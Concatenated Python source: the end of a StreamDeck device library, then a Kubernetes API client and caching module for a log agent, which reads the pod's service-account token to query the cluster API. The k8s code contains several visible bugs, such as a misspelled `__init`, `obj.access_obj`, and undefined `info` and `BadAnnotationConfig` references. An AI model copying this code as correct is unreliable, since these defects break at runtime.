self.read_poll_hz = min(max(hz, 1), 1000)
def set_key_callback(self, callback):
"""
Sets the callback function called each time a button on the StreamDeck
changes state (either pressed, or released).
.. note:: This callback will be fired from an internal reader thread.
Ensure that the given callback function is thread-safe.
.. note:: Only one callback can be registered at one time.
.. seealso:: See :func:`~StreamDeck.set_key_callback_async` method for
a version compatible with Python 3 `asyncio` asynchronous
functions.
:param function callback: Callback function to fire each time a button
state changes.
"""
self.key_callback = callback
def set_key_callback_async(self, async_callback, loop=None):
"""
Sets the asynchronous callback function called each time a button on the
StreamDeck changes state (either pressed, or released). The given
callback should be compatible with Python 3's `asyncio` routines.
.. note:: The asynchronous callback will be fired in a thread-safe
manner.
.. note:: This will override the callback (if any) set by
:func:`~StreamDeck.set_key_callback`.
:param function async_callback: Asynchronous callback function to fire
each time a button state changes.
:param asyncio.loop loop: Asyncio loop to dispatch the callback into
"""
import asyncio
loop = loop or asyncio.get_event_loop()
def callback(*args):
asyncio.run_coroutine_threadsafe(async_callback(*args), loop)
self.set_key_callback(callback)
def key_states(self):
"""
Retrieves the current states of the buttons on the StreamDeck.
:rtype: list(bool)
:return: List describing the current states of each of the buttons on
the device (`True` if the button is being pressed, `False`
otherwise).
"""
return self.last_key_states
@abstractmethod
def reset(self):
"""
Resets the StreamDeck, clearing all button images and showing the
standby image.
"""
pass
@abstractmethod
def set_brightness(self, percent):
"""
Sets the global screen brightness of the StreamDeck, across all the
physical buttons.
:param int/float percent: brightness percent, from [0-100] as an `int`,
or normalized to [0.0-1.0] as a `float`.
"""
pass
@abstractmethod
def get_serial_number(self):
"""
Gets the serial number of the attached StreamDeck.
:rtype: str
:return: String containing the serial number of the attached device.
"""
pass
@abstractmethod
def get_firmware_version(self):
"""
Gets the firmware version of the attached StreamDeck.
:rtype: str
:return: String containing the firmware version of the attached device.
"""
pass
@abstractmethod
def set_key_image(self, key, image):
"""
Sets the image of a button on the StreamDeck to the given image. The
image being set should be in the correct format for the device, as an
enumerable collection of bytes.
.. seealso:: See :func:`~StreamDeck.get_key_image_format` method for
information on the image format accepted by the device.
:param int key: Index of the button whose image is to be updated.
:param enumerable image: Raw data of the image to set on the button.
If `None`, the key will be cleared to a black
color.
"""
pass
|
k8s.py
|
import hashlib
import logging
import os
import random
import string
from string import Template
import scalyr_agent.monitor_utils.annotation_config as annotation_config
import scalyr_agent.third_party.requests as requests
import scalyr_agent.util as util
from scalyr_agent.util import StoppableThread
from scalyr_agent.json_lib import JsonObject
import threading
import time
import traceback
import scalyr_agent.scalyr_logging as scalyr_logging
import urllib
global_log = scalyr_logging.getLogger(__name__)
# endpoints used by the agent for querying the k8s api. Having this mapping allows
# us to avoid special casing the logic for each different object type. We can just
# look up the appropriate endpoint in this dict and query objects however we need.
#
# The dict is keyed by object kind, and or each object kind, there are 3 endpoints:
# single, list and list all.
#
# `single` is for querying a single object of a specific type
# `list` is for querying all objects of a given type in a specific namespace
# `list-all` is for querying all objects of a given type in the entire cluster
#
# the `single` and `list` endpoints are Templates that require the caller to substitute
# in the appropriate values for ${namespace} and ${name}
_OBJECT_ENDPOINTS = {
'CronJob' : {
'single' : Template( '/apis/batch/v1beta1/namespaces/${namespace}/cronjobs/${name}' ),
'list' : Template( '/apis/batch/v1beta1/namespaces/${namespace}/cronjobs' ),
'list-all' : '/apis/batch/v1beta1/cronjobs'
},
'DaemonSet' : {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/daemonsets/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/daemonsets' ),
'list-all' : '/apis/apps/v1/daemonsets'
},
'Deployment' : {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/deployments/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/deployments' ),
'list-all' : '/apis/apps/v1/deployments'
},
'Job' : {
'single' : Template( '/apis/batch/v1/namespaces/${namespace}/jobs/${name}' ),
'list' : Template( '/apis/batch/v1/namespaces/${namespace}/jobs' ),
'list-all' : '/apis/batch/v1/jobs'
},
'Pod' : {
'single' : Template( '/api/v1/namespaces/${namespace}/pods/${name}' ),
'list' : Template( '/api/v1/namespaces/${namespace}/pods' ),
'list-all' : '/api/v1/pods'
},
'ReplicaSet': {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/replicasets/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/replicasets' ),
'list-all' : '/apis/apps/v1/replicasets'
},
'ReplicationController': {
'single' : Template( '/api/v1/namespaces/${namespace}/replicationcontrollers/${name}' ),
'list' : Template( '/api/v1/namespaces/${namespace}/replicationcontrollers' ),
'list-all' : '/api/v1/replicationcontrollers'
},
'StatefulSet': {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/statefulsets/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/statefulsets' ),
'list-all' : '/apis/apps/v1/statefulsets'
},
}
class K8sApiException( Exception ):
"""A wrapper around Exception that makes it easier to catch k8s specific
exceptions
"""
pass
class K8sApiAuthorizationException( K8sApiException ):
"""A wrapper around Exception that makes it easier to catch k8s specific
exceptions
"""
def __init( self, path ):
super(K8sApiAuthorizationException, self).__init__( "You don't have permission to access %s. Please ensure you have correctly configured the RBAC permissions for the scalyr-agent's service account" % path )
class KubeletApiException( Exception ):
"""A wrapper around Exception that makes it easier to catch k8s specific
exceptions
"""
pass
class PodInfo( object ):
"""
A collection class that stores label and other information about a kubernetes pod
"""
def __init__( self, name='', namespace='', uid='', node_name='', labels={}, container_names=[], annotations={}, controller=None ):
self.name = name
self.namespace = namespace
self.uid = uid
self.node_name = node_name
self.labels = labels
self.container_names = container_names
self.annotations = annotations
self.controller = controller # controller can't change for the life of the object so we don't include it in hash
# generate a hash we can use to compare whether or not
# any of the pod info has changed
md5 = hashlib.md5()
md5.update( name )
md5.update( namespace )
md5.update( uid )
md5.update( node_name )
# flatten the labels dict in to a single string because update
# expects a string arg. To avoid cases where the 'str' of labels is
# just the object id, we explicitly create a flattened string of
# key/value pairs
flattened = []
for k,v in labels.iteritems():
flattened.append( k )
flattened.append( v )
md5.update( ''.join( flattened ) )
# flatten the container names
# see previous comment for why flattening is necessary
md5.update( ''.join( container_names ) )
# flatten the annotations dict in to a single string
# see previous comment for why flattening is necessary
flattened = []
for k,v in annotations.iteritems():
flattened.append( k )
flattened.append( str(v) )
md5.update( ''.join( flattened ) )
self.digest = md5.digest()
def exclude_pod( self, container_name=None, default=False ):
"""
Returns whether or not this pod should be excluded based
on include/exclude annotations. If an annotation 'exclude' exists
then this will be returned. If an annotation 'include' exists, then
the boolean opposite of 'include' will be returned. 'include' will
always override 'exclude' if it exists.
param: container_name - if specified, and container_name exists in
the pod annotations, then the container specific annotations will
also be checked. These will supercede the pod level include/exclude
annotations
param: default - Boolean the default value if no annotations are found
return Boolean - whether or not to exclude this pod
"""
def exclude_status( annotations, default ):
exclude = util.value_to_bool( annotations.get('exclude', default) )
# include will always override value of exclude if both exist
exclude = not util.value_to_bool( annotations.get('include', not exclude) )
return exclude
result = exclude_status( self.annotations, default )
if container_name and container_name in self.annotations:
result = exclude_status( self.annotations[container_name], result )
return result
class Controller( object ):
"""
General class for all cached Controller objects
"""
def __init__( self, name='', namespace='', kind='', parent_name=None, parent_kind=None, labels={} ):
self.name = name
self.namespace = namespace
self.kind = kind
self.access_time = None
self.parent_name = parent_name
self.parent_kind = parent_kind
flat_labels = []
for key, value in labels.iteritems():
flat_labels.append( "%s=%s" % (key, value) )
self.flat_labels = ','.join( flat_labels )
class _K8sCache( object ):
"""
A cached store of objects from a k8s api query
This is a private class to this module. See KubernetesCache which instantiates
instances of _K8sCache for querying different k8s API objects.
This abstraction is thread-safe-ish, assuming objects returned
from querying the cache are never written to.
"""
def __init__( self, logger, k8s, processor, object_type, filter=None, perform_full_updates=True ):
"""
Initialises a Kubernees Cache
@param: logger - a Scalyr logger
@param: k8s - a KubernetesApi object
@param: processor - a _K8sProcessor object for querying/processing the k8s api
@param: object_type - a string containing a textual name of the objects being cached, for use in log messages
@param: filter - a k8s filter string or none if no filtering is to be done
@param: perform_full_updates - Boolean. If False no attempts will be made to fully update the cache (only single items will be cached)
"""
# protects self.objects
self._lock = threading.Lock()
# dict of object dicts. The outer dict is hashed by namespace,
# and the inner dict is hashed by object name
self._objects = {}
self._logger = logger
self._k8s = k8s
self._processor = processor
self._object_type = object_type
self._filter = filter
self._perform_full_updates=perform_full_updates
def shallow_copy(self):
"""Returns a shallow copy of all the cached objects dict"""
result = {}
self._lock.acquire()
try:
for k, v in self._objects.iteritems():
result[k] = v
finally:
self._lock.release()
return result
def purge_expired( self, access_time ):
"""
removes any items from the store who haven't been accessed since `access_time`
"""
self._lock.acquire()
stale = []
try:
for namespace, objs in self._objects.iteritems():
for obj_name, obj in objs.iteritems():
if hasattr( obj, 'access_time' ):
if obj.access_time is None or obj.access_obj.access_time < access_time:
stale.append( (namespace, obj_name) )
for (namespace, obj_name) in stale:
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "Removing object %s/%s from cache" % (namespace, obj_name) )
self._objects[namespace].pop( obj_name, None )
finally:
self._lock.release()
def update( self, kind ):
""" do a full update of all information from the API
"""
if not self._perform_full_updates:
return
objects = {}
try:
self._logger.log(scalyr_logging.DEBUG_LEVEL_1, 'Attempting to update k8s %s data from API' % kind )
query_result = self._k8s.query_objects( kind, filter=self._filter)
objects = self._process_objects( kind, query_result )
except K8sApiException, e:
global_log.warn( "Error accessing the k8s API: %s" % (str( e ) ),
limit_once_per_x_secs=300, limit_key='k8s_cache_update' )
# early return because we don't want to update our cache with bad data
return
except Exception, e:
self._logger.warning( "Exception occurred when updating k8s %s cache. Cache was not updated %s\n%s" % (kind, str( e ), traceback.format_exc()) )
# early return because we don't want to update our cache with bad data
return
self._lock.acquire()
try:
self._objects = objects
finally:
self._lock.release()
def _update_object( self, kind, namespace, name, current_time ):
""" update a single object, returns the object if found, otherwise return None """
result = None
try:
# query k8s api and process objects
obj = self._k8s.query_object( kind, namespace, name )
result = self._processor.process_object( obj )
except K8sApiException, e:
# Don't do anything here. This means the object we are querying doensn't exist
# and it's up to the caller to handle this by detecting a None result
pass
# update our cache if we have a result
if result:
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "Processing single %s: %s/%s" % (self._object_type, result.namespace, result.name) )
self._lock.acquire()
try:
if result.namespace not in self._objects:
self._objects[result.namespace] = {}
current = self._objects[result.namespace]
current[result.name] = result
finally:
self._lock.release()
return result
def _process_objects( self, kind, objects ):
"""
Processes the dict returned from querying the objects and calls the _K8sProcessor to create relevant objects for caching,
@param kind: The kind of the objects
@param objects: The JSON object returned as a response from quering all objects. This JSON object should contain an
element called 'items', which is an array of dicts
@return: a dict keyed by namespace, whose values are a dict of objects inside that namespace, keyed by objects name
"""
# get all objects
items = objects.get( 'items', [] )
# iterate over all objects, getting Info objects and storing them in the result
# dict, hashed by namespace and object name
result = {}
for obj in items:
info = self._processor.process_object( obj )
self._logger.log( scalyr_logging.DEBUG_LEVEL_1, "Processing %s: %s:%s" % (kind, info.namespace, info.name) )
if info.namespace not in result:
result[info.namespace] = {}
current = result[info.namespace]
if info.name in current:
self._logger.warning( "Duplicate %s '%s' found in namespace '%s', overwriting previous values" % (kind, info.name, info.namespace),
limit_once_per_x_secs=300, limit_key='duplicate-%s-%s' % (kind, info.uid) )
current[info.name] = info
return result
def _lookup_object( self, namespace, name, current_time ):
""" Look to see if the object specified by the namespace and name
exists within the cached data.
Return the object info, or None if not found
"""
result = None
self._lock.acquire()
try:
objects = self._objects.get( namespace, {} )
result = objects.get( name, None )
# update access time
if result is not None:
result.access_time = current_time
finally:
self._lock.release()
return result
def lookup( self, namespace, name, kind=None, current_time=None ):
""" returns info for the object specified by namespace and name
or None if no object is found in the cache.
Querying the information is thread-safe, but the returned object should
not be written to.
"""
if kind is None:
kind = self._object_type
# see if the object exists in the cache and return it if so
result = self._lookup_object( namespace, name, current_time )
if result:
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "cache hit for %s %s/%s" % (kind, namespace, name) )
return result
# we have a cache miss so query the object individually
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "cache miss for %s %s/%s" % (kind, namespace, name) )
result = self._update_object( kind, namespace, name, current_time )
return result
class _K8sProcessor( object ):
"""
An abstract interface used by _K8sCache for querying a specific type of
object from the k8s api, and generating python objects from the queried result JSON.
"""
def __init__( self, logger ):
"""
@param: logger - a Scalyr logger object for logging
"""
self._logger = logger
def _get_managing_controller( self, items ):
"""
Processes a list of items, searching to see if one of them
is a 'managing controller', which is determined by the 'controller' field
@param: items - an array containing 'ownerReferences' metadata for an object
returned from the k8s api
@return: A dict containing the managing controller of type `kind` or None if no such controller exists
"""
for i in items:
controller = i.get( 'controller', False )
if controller:
return i
return None
def process_object( self, obj ):
"""
Creates a python object based of a dict
@param obj: A JSON dict returned as a response to querying
the k8s API for a specific object type.
@return a python object relevant to the
"""
pass
class PodProcessor( _K8sProcessor ):
def __init__( self, logger, controllers ):
super( PodProcessor, self).__init__( logger )
self._controllers = controllers
def _get_controller_from_owners( self, owners, namespace ):
"""
Processes a list of owner references returned from a Pod's metadata to see
if it is eventually owned by a Controller, and if so, returns the Controller object
@return Controller - a Controller object
"""
controller = None
# check if we are owned by another controller
owner = self._get_managing_controller( owners )
if owner is None:
return None
# make sure owner has a name field and a kind field
name = owner.get( 'name', None )
if name is None:
return None
kind = owner.get( 'kind', None )
if kind is None:
return None
# walk the parent until we get to the root controller
# Note: Parent controllers will always be in the same namespace as the child
controller = self._controllers.lookup( namespace, name, kind=kind )
while controller:
if controller.parent_name is None:
self._logger.log(scalyr_logging.DEBUG_LEVEL_1, 'controller %s has no parent name' % controller.name )
break
if controller.parent_kind is None:
self._logger.log(scalyr_logging.DEBUG_LEVEL_1, 'controller %s has no parent kind' % controller.name )
break
# get the parent controller
parent_controller = self._controllers.lookup( namespace, controller.parent_name, kind=controller.parent_kind )
# if the parent controller doesn't exist, assume the current controller
# is the root controller
if parent_controller is None:
break
# walk up the chain
controller = parent_controller
return controller
def process_object( self, obj ):
""" Generate a PodInfo object from a JSON object
@param pod: The JSON object returned as a response to querying
a specific pod from the k8s API
@return A PodInfo object
"""
result = {}
metadata = obj.get( 'metadata', {} )
spec = obj.get( 'spec', {} )
labels = metadata.get( 'labels', {} )
annotations = metadata.get( 'annotations', {} )
owners = metadata.get( 'ownerReferences', [] )
pod_name = metadata.get( "name", '' )
namespace = metadata.get( "namespace", '' )
controller = self._get_controller_from_owners( owners, namespace )
container_names = []
for container in spec.get( 'containers', [] ):
container_names.append( container.get( 'name', 'invalid-container-name' ) )
try:
annotations = annotation_config.process_annotations( annotations )
except BadAnnotationConfig, e:
self._logger.warning( "Bad Annotation config for %s/%s. All annotations ignored. %s" % (namespace, pod_name, str( e )),
limit_once_per_x_secs=300, limit_key='bad-annotation-config-%s' % info.uid )
annotations = JsonObject()
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "Annotations: %s" % ( str( annotations ) ) )
# create the PodInfo
result = PodInfo( name=pod_name,
namespace=namespace,
uid=metadata.get( "uid", '' ),
node_name=spec.get( "nodeName", '' ),
labels=labels,
container_names=container_names,
annotations=annotations,
controller=controller)
return result
class ControllerProcessor( _K8sProcessor ):
def __init__( self, logger ):
super( ControllerProcessor, self).__init__( logger )
def process_object( self, obj ):
""" Generate a Controller object from a JSON object
@param obj: The JSON object returned as a response to querying
a specific controller from the k8s API
@return A Controller object
"""
metadata = obj.get( 'metadata', {} )
kind = obj.get( "kind", '' )
owners = metadata.get( 'ownerReferences', [] )
namespace = metadata.get( "namespace", '' )
name = metadata.get( "name", '' )
labels = metadata.get( 'labels', {} )
parent_name = None
parent_kind = None
parent = self._get_managing_controller( owners )
if parent is not None:
parent_name = parent.get( 'name', None )
parent_kind = parent.get( 'kind', None )
return Controller( name, namespace, kind, parent_name, parent_kind, labels )
class KubernetesCache( object ):
def __init__( self, k8s, logger, cache_expiry_secs=30, cache_purge_secs=300, namespaces_to_ignore=None ):
self._k8s = k8s
self._namespace_filter = self._build_namespace_filter( namespaces_to_ignore )
self._node_filter = self._build_node_filter( self._namespace_filter )
# create the controller cache
self._controller_processor = ControllerProcessor( logger )
self._controllers = _K8sCache( logger, k8s, self._controller_processor, '<controller>',
filter=self._namespace_filter,
perform_full_updates=False )
# create the pod cache
self._pod_processor = PodProcessor( logger, self._controllers )
self._pods = _K8sCache( logger, k8s, self._pod_processor, 'Pod',
filter=self._node_filter )
self._cluster_name = None
self._cache_expiry_secs = cache_expiry_secs
self._cache_purge_secs = cache_purge_secs
self._last_full_update = time.time() - cache_expiry_secs - 1
self._lock = threading.Lock()
self._initialized = False
self._thread = StoppableThread( target=self.update_cache, name="K8S Cache" )
self._thread.start()
def stop(self):
"""Stops the cache, specifically stopping the background thread that refreshes the cache"""
self._thread.stop()
def is_initialized( self ):
"""Returns whether or not the k8s cache has been initialized with the full pod list"""
result = False
self._lock.acquire()
try:
result = self._initialized
finally:
self._lock.release()
return result
def _update_cluster_name( self ):
"""Updates the cluster name"""
cluster_name = self._k8s.get_cluster_name()
self._lock.acquire()
try:
self._cluster_name = cluster_name
finally:
self._lock.release()
def update_cache( self, run_state ):
"""
Main thread for updating the k8s cache
"""
start_time = time.time()
while run_state.is_running() and not self.is_initialized():
try:
# we only pre warm the pod cache and the cluster name
# controllers are cached on an as needed basis
self._pods.update( 'Pod' )
self._update_cluster_name()
self._lock.acquire()
try:
self._initialized = True
finally:
self._lock.release()
except K8sApiException, e:
global_log.warn( "Exception occurred when initializing k8s cache - %s" % (str( e ) ),
limit_once_per_x_secs=300, limit_key='k8s_api_init_cache' )
except Exception, e:
global_log.warn( "Exception occurred when initializing k8s cache - %s\n%s" % (str( e ), traceback.format_exc()) )
current_time = time.time()
elapsed = current_time - start_time
global_log.info( "Kubernetes cache initialized in %.2f seconds" % elapsed )
# go back to sleep if we haven't taken longer than the expiry time
if elapsed < self._cache_expiry_secs:
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "sleeping for %.2f seconds" % (self._cache_expiry_secs - elapsed) )
run_state.sleep_but_awaken_if_stopped( self._cache_expiry_secs - elapsed )
# start the main update loop
last_purge = time.time()
while run_state.is_running():
try:
current_time = time.time()
self._pods.update( 'Pod' )
self._update_cluster_name()
if last_purge + self._cache_purge_secs < current_time:
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "Purging unused controllers" )
self._controllers.purge_expired( last_purge )
last_purge = current_time
except K8sApiException, e:
global_log.warn( "Exception occurred when updating k8s cache - %s" % (str( e ) ),
limit_once_per_x_secs=300, limit_key='k8s_api_update_cache' )
except Exception, e:
global_log.warn( "Exception occurred when updating k8s cache - %s\n%s" % (str( e ), traceback.format_exc()) )
run_state.sleep_but_awaken_if_stopped( self._cache_expiry_secs )
def _build_namespace_filter( self, namespaces_to_ignore ):
"""Builds a field selector to ignore the namespaces in `namespaces_to_ignore`"""
result = ''
if namespaces_to_ignore:
for n in namespaces_to_ignore:
result += 'metadata.namespace!=%s,' % n
result = result[:-1]
return result
def _build_node_filter( self, namespace_filter ):
"""Builds a fieldSelector filter to be used when querying pods the k8s api, limiting them to the current node"""
result = None
pod_name = '<unknown>'
try:
pod_name = self._k8s.get_pod_name()
node_name = self._k8s.get_node_name( pod_name )
if node_name:
result = 'spec.nodeName=%s' % node_name
else:
global_log.warning( "Unable to get node name for pod '%s'. This will have negative performance implications for clusters with a large number of pods. Please consider setting the environment variable SCALYR_K8S_NODE_NAME to valueFrom:fieldRef:fieldPath:spec.nodeName in your yaml file" )
except K8sApiException, e:
global_log.warn( "Failed to build k8s filter -- %s" % (str( e ) ) )
except Exception, e:
global_log.warn( "Failed to build k8s filter - %s\n%s" % (str(e), traceback.format_exc() ))
if result is not None and namespace_filter:
result += ",%s" % namespace_filter
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "k8s node filter for pod '%s' is '%s'" % (pod_name, result) )
return result
def pod( self, namespace, name, current_time=None ):
""" returns pod info for the pod specified by namespace and name
or None if no pad matches.
Querying the pod information is thread-safe, but the returned object should
not be written to.
"""
return self._pods.lookup( namespace, name, kind='Pod', current_time=current_time )
def controller( self, namespace, name, kind, current_time=None ):
""" returns controller info for the controller specified by namespace and name
or None if no controller matches.
Querying the controller information is thread-safe, but the returned object should
not be written to.
"""
return self._controllers.lookup( namespace, name, kind=kind, current_time=current_time )
def pods_shallow_copy(self):
"""Retuns a shallow copy of the pod objects"""
return self._pods.shallow_copy()
def get_cluster_name( self ):
"""Returns the cluster name"""
result = None
self._lock.acquire()
try:
result = self._cluster_name
finally:
self._lock.release()
return result
class KubernetesApi( object ):
"""Simple wrapper class for querying the k8s api
"""
def __init__( self, ca_file='/run/secrets/kubernetes.io/serviceaccount/ca.crt',
k8s_api_url="https://kubernetes.default"):
"""Init the kubernetes object
"""
# fixed well known location for authentication token required to
# query the API
token_file="/var/run/secrets/kubernetes.io/serviceaccount/token"
# fixed well known location for namespace file
namespace_file="/var/run/secrets/kubernetes.io/serviceaccount/namespace"
self._http_host = k8s_api_url
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "Kubernetes API host: %s", self._http_host )
self._timeout = 10.0
self._session = None
self._ca_file = ca_file
# We create a few headers ahead of time so that we don't have to recreate them each time we need them.
self._standard_headers = {
'Connection': 'Keep-Alive',
'Accept': 'application/json',
}
# The k8s API requires us to pass in an authentication token
# which we can obtain from a token file in a 'well known' location
token = ''
try:
# using with is ok here, because we need to be running
# a recent version of python for various 3rd party libs
with open( token_file, 'r' ) as f:
token = f.read()
except IOError, e:
pass
#get the namespace this pod is running on
self.namespace = 'default'
try:
# using with is ok here, because we need to be running
# a recent version of python for various 3rd party libs
with open( namespace_file, 'r' ) as f:
self.namespace = f.read()
except IOError, e:
pass
self._standard_headers["Authorization"] = "Bearer %s" % (token)
def _verify_connection( self ):
""" Return whether or not to use SSL verification
"""
if self._ca_file:
return self._ca_file
return False
def _ensure_session( self ):
"""Create the session if it doesn't exist, otherwise do nothing
"""
if not self._session:
self._session = requests.Session()
self._session.headers.update( self._standard_headers )
def get_pod_name( self ):
""" Gets the pod name of the pod running the scalyr-agent """
return os.environ.get( 'SCALYR_K8S_POD_NAME' ) or os.environ.get( 'HOSTNAME' )
def get_node_name( self, pod_name ):
""" Gets the node name of the node running the agent """
node = os.environ.get( 'SCALYR_K8S_NODE_NAME' )
if not node:
pod = self.query_pod( self.namespace, pod_name )
spec = pod.get( 'spec', {} )
node = spec.get( 'nodeName' )
return node
def get_cluster_name( self ):
""" Returns the name of the cluster running this agent.
There is no way to get this from the k8s API so we check the following:
If the environment variable SCALYR_K8S_CLUSTER_NAME is set, then use that.
Otherwise query the api for the pod running the agent container and check to see
if it has an annotation: agent.config.scalyr.com/cluster_name, and if so, use that.
Otherwise return None
"""
cluster = os.environ.get( 'SCALYR_K8S_CLUSTER_NAME' )
if cluster:
return cluster
pod_name = self.get_pod_name()
pod = self.query_pod( self.namespace, pod_name )
if pod is None:
return None
metadata = pod.get( 'metadata', {} )
annotations = metadata.get( 'annotations', {} )
if 'agent.config.scalyr.com/cluster_name' in annotations:
return annotations['agent.config.scalyr.com/cluster_name']
return None
def query_api( self, path, pretty=0 ):
""" Queries the k8s API at 'path', and converts OK responses to JSON objects
"""
self._ensure_session()
pretty='pretty=%d' % pretty
if "?" in path:
pretty = '&%s' % pretty
else:
pretty = '?%s' % pretty
url = self._http_host + path + pretty
response = self._session.get( url, verify=self._verify_connection(), timeout=self._timeout )
response.encoding = "utf-8"
if response.status_code != 200:
if response.status_code == 401 or response.status_code == 403:
raise K8sApiAuthorizationException( path )
global_log.log(scalyr_logging.DEBUG_LEVEL_3, "Invalid response from K8S API.\n\turl: %s\n\tstatus: %d\n\tresponse length: %d"
% ( url, response.status_code, len(response.text)), limit_once_per_x_secs=300, limit_key='k8s_api_query' )
raise K8sApiException( "Invalid response from Kubernetes API when querying '%s': %s" %( path, str( response ) ) )
return util.json_decode( response.text )
def query_object( self, kind, namespace, name ):
""" Queries a single object from the k8s api based on an object kind, a namespace and a name
An empty dict is returned if the object kind is unknown, or if there is an error generating
an appropriate query string
@param: kind - the kind of the object
@param: namespace - the namespace to query in
@param: name - the name of the object
@return - a dict returned by the query
"""
if kind not in _OBJECT_ENDPOINTS:
global_log.warn( 'k8s API - tried to query invalid object type: %s, %s, %s' % (kind, namespace, name),
limit_once_per_x_secs=300, limit_key='k8s_api_query-%s' % kind )
return {}
query = None
try:
query = _OBJECT_ENDPOINTS[kind]['single'].substitute( name=name, namespace=namespace )
except Exception, e:
global_log.warn( 'k8s API - failed to build query string - %s' % (str(e)),
limit_once_per_x_secs=300, limit_key='k8s_api_build_query-%s' % kind )
return {}
return self.query_api( query )
def query_objects( self, kind, namespace=None, filter=None ):
""" Queries a list of objects from the k8s api based on an object kind, optionally limited by
a namespace and a filter
A dict containing an empty 'items' array is returned if the object kind is unknown, or if there is an error generating
an appropriate query string
"""
if kind not in _OBJECT_ENDPOINTS:
global_log.warn( 'k8s API - tried to list invalid object type: %s, %s' % (kind, namespace),
limit_once_per_x_secs=300, limit_key='k8s_api_list_query-%s' % kind )
return { 'items': [] }
query = _OBJECT_ENDPOINTS[kind]['list-all']
if namespace:
try:
query = _OBJECT_ENDPOINTS[kind]['list'].substitute( namespace=namespace )
except Exception, e:
global_log.warn( 'k8s API - failed to build namespaced query list string - %s' % (str(e)),
limit_once_per_x_secs=300, limit_key='k8s_api_build_list_query-%s' % kind )
if filter:
query = "%s?fieldSelector=%s" % (query, urllib.quote( filter ))
return self.query_api( query )
def query_pod( self, namespace, name ):
"""Convenience method for query a single pod"""
return self.query_object( 'Pod', namespace, name )
def query_pods( self, namespace=None, filter=None ):
"""Convenience method for query a single pod"""
return self.query_objects( 'Pod', namespace, filter )
def query_namespaces( self ):
"""Wrapper to query all namespaces"""
return self.query_api( '/api/v1/namespaces' )
def stream_events( self, path="/api/v1/watch/events", last_event=None ):
"""Streams k8s events from location specified at path"""
self._ensure_session()
url = self._http_host + path
if last_event:
resource='resourceVersion=%s' % str(last_event)
if "?" in url:
resource = '&%s' % resource
else:
resource = '?%s' % resource
url += resource
response = self._session.get( url, verify=self._verify_connection(), timeout=self._timeout, stream=True )
if response.status_code != 200:
global_log.log(scalyr_logging.DEBUG_LEVEL_0, "Invalid response from K8S API.\n\turl: %s\n\tstatus: %d\n\tresponse length: %d"
% ( url, response.status_code, len(response.text)), limit_once_per_x_secs=300, limit_key='k8s_stream_events' )
raise K8sApiException( "Invalid response from Kubernetes API when querying %d - '%s': %s" % ( response.status_code, path, str( response ) ) )
for line in response.iter_lines():
if line:
yield line
class KubeletApi( object ):
"""
A class for querying the kubelet API
"""
def __init__( self, k8s, port=10255 ):
"""
@param k8s - a KubernetesApi object
"""
pod_name = k8s.get_pod_name()
pod = k8s.query_pod( k8s.namespace, pod_name )
spec = pod.get( 'spec', {} )
status = pod.get( 'status', {} )
host_ip = status.get( 'hostIP', None )
if host_ip is None:
raise KubeletApiException( "Unable to get host IP for pod: %s/%s" % (k8s.namespace, pod_name) )
self._session = requests.Session()
headers = {
'Accept': 'application/json',
}
self._session.headers.update( headers )
self._http_host = "http://%s:%d" % ( host_ip, port )
self._timeout = 10.0
def query_api( self, path ):
""" Queries the kubelet API at 'path', and converts OK responses to JSON objects
"""
url = self._http_host + path
response = self._session.get( url, timeout=self._timeout )
response.encoding = "utf-8"
if response.status_code != 200:
global_log.log(scalyr_logging.DEBUG_LEVEL_3, "Invalid response from Kubelet API.\n\turl: %s\n\tstatus: %d\n\tresponse length: %d"
% ( url, response.status_code, len(response.text)), limit_once_per_x_secs=300, limit_key='kubelet_api_query' )
raise KubeletApiException( "Invalid response from Kubelet API when querying '%s': %s" %( path, str( response ) ) )
return util.json_decode( response.text )
def query_stats( self ):
return self.query_api( '/stats/summary')
class DockerMetricFetcher(object):
"""Allows for parallel fetching of container metrics from Docker. Typically, one instance of this object
will be created per monitor (Docker or Kubernetes). This current implementation relies on threads to
issue multiple `stats` requests in parallel.
This approach is necessary because the `stats` Docker command blocks for 2 seconds while it gathers
cpu measures over the interval. If we had 40 containers whose metrics we were trying to retrieve, we would
have to wait for a total of 80 seconds if we issued the `stats` request one at a time.
To get the benefit of this approach, you must first invoke `prefetch_metrics` for each container whose metrics
you wish to retrieve, and then invoke `get_metrics` to actually get the metrics.
"""
def __init__(self, docker_client, concurrency, logger):
"""
@param docker_client: The docker client object to use for issuing `stats` requests.
@param concurrency: The maximum number of `stats` requests to issue in parallel. This controls the maximum
number of threads that will be created.
@param logger: The logger
@type docker_client: k8s_test.MetricFaker
@type concurrency: int
@type logger: scalyr_agent.scalyr_logging.AgentLogger
"""
self.__docker_client = docker_client
self.__logger = logger
self.__concurrency = concurrency
# A sentinel value used in the `__container_scoreboard` to indicate the container is in the queue to be fetched.
self.__PENDING = dict()
# A sentinel value used in the `__container_scoreboard` to indicate the `stats` call for a container has been
# issued but no response has been received.
self.__IN_FLIGHT = dict()
# The lock that must be held for all other state variables in this class.
self.__lock = threading.Lock()
# Records the state of requesting metrics for all containers. Maps the container name to its state or
# metric value. If the value is __PENDING, then the `stats` request for the request has not been issued.
# If it is __IN_FLIGHT, it has been requested. If it is None, an error occurred. Otherwise, the value
# is the result of the `stats` request.
self.__container_scoreboard = dict()
# Whether or not `stop` has been invoked.
self.__is_stopped = False
# The conditional variable that can be waited on to be notified of any changes to the state of this object,
# such as whether it has been stopped or if a stats results has been added in to `__container_scoreboard`.
self.__cv = threading.Condition(self.__lock)
# The number of worker threads (to perform `stats` calls) that have been created. This will always be
# less than `concurrency`.
self.__num_worker_threads = 0
# A list of containers whose metrics should be fetched. This is the same as all entries in
# `__container_scoreboard` whose value is `__PENDING`.
